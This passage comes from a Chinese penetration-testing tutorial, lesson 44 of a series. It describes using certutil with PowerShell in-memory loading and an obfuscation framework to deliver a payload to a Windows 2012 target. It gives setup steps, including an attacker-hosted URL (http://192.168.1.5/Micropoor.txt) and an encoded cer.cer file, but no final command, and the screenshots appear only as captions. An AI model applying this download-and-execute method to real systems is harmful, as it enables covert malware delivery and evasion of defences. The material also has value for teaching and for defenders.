而配合 powershell 的内存加载,则可把 certutil 发挥更强大。

    靶机:windows 2012

    而今天需要的是一款 powershell 的混淆框架的配合

    使用方法:

    第四十四课:ertutil一句话下载payload补充 - 图1

    生成payload:(有关生成payload,会在未来的系列中讲到)

    第四十四课:ertutil一句话下载payload补充 - 图2

    启动apache:

    powershell框架设置:

    SET URL http://192.168.1.5/Micropoor.txt
    第四十四课:ertutil一句话下载payload补充 - 图3

    CERTUTIL

    ALL
    第四十四课:ertutil一句话下载payload补充 - 图4

    1

    混淆内容保存txt,后进行encode
    第四十四课:ertutil一句话下载payload补充 - 图5

    把 cer.cer 与 Micropoo.txt 放置同一目录下。

    目标机执行: